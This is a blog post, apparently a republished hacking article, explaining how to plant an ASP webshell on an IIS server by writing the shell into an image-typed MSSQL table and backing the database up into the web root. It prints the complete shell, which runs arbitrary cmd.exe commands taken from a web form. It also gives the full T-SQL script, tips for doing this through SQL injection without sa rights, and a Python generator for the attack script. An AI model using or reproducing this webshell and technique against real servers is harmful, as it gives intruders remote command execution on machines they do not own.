Create WebShell with MSSQL Backup

Posted by xiaoxiao, 2021-03-06

I wrote earlier about doing this kind of thing from inside the database under MySQL. I remember a classic post that combined a TCP rebound with an input-method trick; its first, and most important, step was exporting a table with MySQL. Getting a shell on a web server is a different matter. Access is not powerful enough: when there is an injection vulnerability it offers no way to run commands directly. MSSQL has been studied by far more people and there are many ways to execute commands through it, but without EXEC permission on the procedures that run commands, what you can do is still limited. Many people ask whether MSSQL can export a table to a file the way MySQL can, so that at least a low-privilege account gets somewhere. I looked for a command that exports a single table and did not find one; but if a table cannot be exported, the whole database can, and in most situations the effect is the same.

Before getting to practice, a look at why this works. When IIS hands a .asp file to asp.dll, everything outside <% %> is sent to the client as-is. Copy an .exe into the web publishing directory, rename it .asp and request it in IE: what comes back is, for the most part, the raw contents of the .exe, not a 500 Internal Server Error. What sits inside <% %> is, by default, interpreted and executed as VBScript, and a syntax error there produces the familiar 500 error. In other words, given any file with a .asp extension, as long as we carefully control everything inside the <% %> pairs, it will execute correctly; what lies outside them asp.dll does not touch, so we need not care about it.

Now look at what BACKUP DATABASE does under MSSQL. Export a database, say model, and inspect the result; in Query Analyzer:

BACKUP DATABASE model TO DISK = 'c:\a.txt'

Open the file in a text editor. From the analysis above we need to know only one thing: if this file were renamed .asp, would it cause trouble? So search it for <% and %>. Obviously there are none, which means a request for the file would simply return its contents as text. That the default export contains nothing that could raise an interpretation error is the key step. What remains is turning it into a shell. Tables are, of course, stored in the backup file along with everything else; we control the contents of a table, so we control part of the contents of the backup.

At this point it is tempting to write the classic ASP shell straight into a new table and run BACKUP DATABASE. It is not that simple, and if you try it on a database you intend to keep experimenting with, you may pay the cost of reinstalling MSSQL. For character data such as text and nvarchar, "abc" in the database comes out of the export as wide characters, "a b c" with an extra byte after each character; a "<%" written that way is no longer "<%" in the backup file, the content between the delimiters is even more of a mess, and nothing is interpreted. To avoid this, the table we create must use a binary type, for example a column of type image: whatever we put in comes out in the backup byte for byte, with nothing changed.

One problem is left. Even with the ASP shell written into a binary table, the rows do not come out as separate lines; who knows what other bytes lie between two rows of the same table in the exported backup. If one row held "<%" and the next held "%>", the junk between them would be handed to VBScript and a 500 error is a certainty. So every row must be a complete <% %> pair; only then do we fully control everything inside <% %> and guarantee a correct ASP shell. Now, finally, the practical part.
You should now see that making a shell with BACKUP DATABASE is entirely feasible. Here is the FSO-based ASP shell rewritten to meet our requirement, one statement per <% %> block. (The HTML form tags were lost in the copy of this article; the form shown is the minimal one that the Request.Form(".CMD") line needs.)

<% Dim oScript %>
<% Dim oScriptNet %>
<% Dim oFileSys, oFile %>
<% Dim szCMD, szTempFile %>
<% Set oScript = Server.CreateObject("WSCRIPT.SHELL") %>
<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") %>
<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") %>
<% szCMD = Request.Form(".CMD") %>
<% If (szCMD <> "") Then %>
<% szTempFile = "C:\" & oFileSys.GetTempName() %>
<% Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) %>
<% Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0) %>
<% End If %>
<form method="post"><input type="text" name=".CMD" size="45" value="<%= szCMD %>"><input type="submit" value="Run"></form>
<pre>
<% If (IsObject(oFile)) Then %>
<% On Error Resume Next %>
<% Response.Write Server.HTMLEncode(oFile.ReadAll) %>
<% oFile.Close %>
<% Call oFileSys.DeleteFile(szTempFile, True) %>
<% End If %>
</pre>

Then open Query Analyzer and enter the following SQL. The idea of these statements: create a table with a binary image column, insert the rewritten shell one row per line, and finally export the whole database to a .asp file. Go!

USE model;
CREATE TABLE cmd (str image);
INSERT INTO cmd (str) VALUES ('<% Dim oScript %>');
INSERT INTO cmd (str) VALUES ('<% Dim oScriptNet %>');
INSERT INTO cmd (str) VALUES ('<% Dim oFileSys, oFile %>');
INSERT INTO cmd (str) VALUES ('<% Dim szCMD, szTempFile %>');
INSERT INTO cmd (str) VALUES ('<% Set oScript = Server.CreateObject("WSCRIPT.SHELL") %>');
INSERT INTO cmd (str) VALUES ('<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") %>');
INSERT INTO cmd (str) VALUES ('<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") %>');
INSERT INTO cmd (str) VALUES ('<% szCMD = Request.Form(".CMD") %>');
INSERT INTO cmd (str) VALUES ('<% If (szCMD <> "") Then %>');
INSERT INTO cmd (str) VALUES ('<% szTempFile = "C:\" & oFileSys.GetTempName() %>');
INSERT INTO cmd (str) VALUES ('<% Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) %>');
INSERT INTO cmd (str) VALUES ('<% Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0) %>');
INSERT INTO cmd (str) VALUES ('<% End If %>');
INSERT INTO cmd (str) VALUES ('<form method="post"><input type="text" name=".CMD" size="45" value="<%= szCMD %>"><input type="submit" value="Run"></form>');
INSERT INTO cmd (str) VALUES ('<pre>');
INSERT INTO cmd (str) VALUES ('<% If (IsObject(oFile)) Then %>');
INSERT INTO cmd (str) VALUES ('<% On Error Resume Next %>');
INSERT INTO cmd (str) VALUES ('<% Response.Write Server.HTMLEncode(oFile.ReadAll) %>');
INSERT INTO cmd (str) VALUES ('<% oFile.Close %>');
INSERT INTO cmd (str) VALUES ('<% Call oFileSys.DeleteFile(szTempFile, True) %>');
INSERT INTO cmd (str) VALUES ('<% End If %>');
INSERT INTO cmd (str) VALUES ('</pre>');
BACKUP DATABASE model TO DISK = 'c:\l.asp';

Copy c:\l.asp into your web publishing directory and request it with a browser. No 500 error: you have a shell. The page is huge, though; you will have to press Tab a few times to reach the command input box.

A last word on what can go wrong. Usually the chosen database contains no <% or %> by default, but it cannot be ruled out; the chance is small, and I have run into it once. If model has never been touched, the exported file certainly meets the requirement. But if you make a mistake, say you create a table with a row that contains <% and no %> on the same row, that database can no longer be used for this unless the change is rolled back. Dropping the table or deleting the row afterwards is not enough either: the bytes stay in the data pages until they happen to be overwritten, so later backups can still carry them.

Of course, the above is only the experiment in Query Analyzer. In a real situation, if the injection runs as sa, things are certainly relaxed; the only trouble is guessing the physical path of the web root, because the backup has to be written straight into the web publishing directory, and a path-disclosure vulnerability elsewhere may help. Two further conditions apply: the file is written by the SQL Server service account on the database host, so that account needs write access to the directory, and the web root must be on the database server's file system (or reachable through a UNC path the service account can write). If you are not sa, Declare @a sysname; select @a = db_name() may be of some use: it lets you back up the current database without knowing its name, and the web application's login usually owns that database, so it has the BACKUP DATABASE permission without being sa. I would not dare claim a high success rate, perhaps 80%. If you really do get a shell this way, you will find it is the cutest and best ASP shell in the world, although it carries a lot of junk, maybe a 2 or 3 MB page.
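The two checks the analysis above performs by eye (does the trial backup already contain ASP delimiters, and is every shell row a self-contained <% %> block), the reason a Unicode column breaks the trick, and the Query Analyzer script itself are automated below. This is an added example written for this article, not code from the original author, in Python so it can run anywhere; the database and table names, the output path, and the sample backup bytes are constructed assumptions, and the db_name() variant of the BACKUP statement is the non-sa form mentioned in the closing notes.

```python
"""Added example, not from the original article: checks and a script generator
for the BACKUP DATABASE webshell trick. Paths, names and the sample backup
bytes are constructed assumptions."""
import re

DELIM = re.compile(rb"<%|%>")

# The article's one-statement-per-block shell, one table row each. Rows that
# are plain HTML carry no delimiters; asp.dll echoes them verbatim.
SHELL_ROWS = [
    '<% Dim oScript %>',
    '<% Dim oScriptNet %>',
    '<% Dim oFileSys, oFile %>',
    '<% Dim szCMD, szTempFile %>',
    '<% Set oScript = Server.CreateObject("WSCRIPT.SHELL") %>',
    '<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") %>',
    '<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") %>',
    '<% szCMD = Request.Form(".CMD") %>',
    '<% If (szCMD <> "") Then %>',
    '<% szTempFile = "C:\\" & oFileSys.GetTempName() %>',
    '<% Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) %>',
    '<% Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0) %>',
    '<% End If %>',
    '<form method="post"><input type="text" name=".CMD" size="45" '
    'value="<%= szCMD %>"><input type="submit" value="Run"></form>',
    '<pre>',
    '<% If (IsObject(oFile)) Then %>',
    '<% On Error Resume Next %>',
    '<% Response.Write Server.HTMLEncode(oFile.ReadAll) %>',
    '<% oFile.Close %>',
    '<% Call oFileSys.DeleteFile(szTempFile, True) %>',
    '<% End If %>',
    '</pre>',
]


def delimiter_problems(data: bytes) -> list:
    """Walk the bytes as asp.dll would: report a <% that is never closed, a <%
    inside an open block, or a %> with no open block. [] means every block
    is closed and the file can be served as .asp (stray text is just echoed)."""
    problems, open_at = [], None
    for m in DELIM.finditer(data):
        if m.group() == b"<%":
            if open_at is not None:
                problems.append((m.start(), "<% inside an open block"))
            open_at = m.start()
        elif open_at is None:
            problems.append((m.start(), "%> without <%"))
        else:
            open_at = None
    if open_at is not None:
        problems.append((open_at, "<% never closed"))
    return problems


def trial_backup_is_clean(backup: bytes) -> bool:
    """The article's first test: the untouched database's backup must contain
    no ASP delimiter at all, or our rows would be interpreted together with
    whatever bytes the engine puts around them."""
    return DELIM.search(backup) is None


def block_count(data: bytes) -> int:
    """Number of complete <% ... %> blocks asp.dll would execute."""
    return len(re.findall(rb"<%.*?%>", data, re.S))


def stored_bytes(row: str, column_type: str) -> bytes:
    """Bytes the engine keeps for `row`, which is what BACKUP copies out.
    image/varbinary/varchar keep the ASCII as given; the Unicode types store
    UTF-16LE, which puts a NUL after every character and splits '<%'.
    Assumption: the shell is pure ASCII, which the rows above are."""
    ctype = column_type.lower()
    if ctype in ("image", "varbinary", "varchar", "char"):
        return row.encode("ascii")
    if ctype in ("nvarchar", "ntext", "nchar"):
        return row.encode("utf-16-le")
    raise ValueError("unhandled column type: " + column_type)


def rows_self_contained(rows) -> list:
    """Unknown page and row bytes sit before and after each row in the backup,
    so a <% a row opens must close in that same row. Returns offending rows."""
    return [r for r in rows if delimiter_problems(r.encode("ascii"))]


def tsql_script(rows, db="model", table="cmd", out_path=r"C:\l.asp",
                current_db=False) -> str:
    """Emit the Query Analyzer script: image-typed table, one INSERT per row
    (single quotes doubled for T-SQL), then BACKUP DATABASE to a file under
    the web root. current_db=True uses db_name() instead of a fixed name, the
    form for an injection point whose login owns its own database but is not sa."""
    stmts = [] if current_db else ["USE %s;" % db]
    stmts.append("CREATE TABLE %s (str image);" % table)
    for row in rows:
        stmts.append("INSERT INTO %s (str) VALUES ('%s');" % (table, row.replace("'", "''")))
    if current_db:
        stmts.append("DECLARE @a sysname; SET @a = db_name();")
        stmts.append("BACKUP DATABASE @a TO DISK = '%s';" % out_path)
    else:
        stmts.append("BACKUP DATABASE %s TO DISK = '%s';" % (db, out_path))
    return "\n".join(stmts)


if __name__ == "__main__":
    # Constructed stand-in for the trial backup c:\a.txt: header junk, no delimiters.
    print("trial backup clean:", trial_backup_is_clean(b"\x01\x0fTAPE\x00 model \xff"))
    print("rows needing a fix:", rows_self_contained(SHELL_ROWS))
    print("blocks seen in an image row:", block_count(stored_bytes(SHELL_ROWS[0], "image")))
    print("blocks seen in an nvarchar row:", block_count(stored_bytes(SHELL_ROWS[0], "nvarchar")))
    print(tsql_script(SHELL_ROWS))
```

Run the trial backup through trial_backup_is_clean() before inserting anything; run rows_self_contained() over your own shell rows before generating the script, since a row that fails it cannot be undone by deleting it later.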

Please credit the original source when reprinting: https://www.9cbs.com/read-86053.html
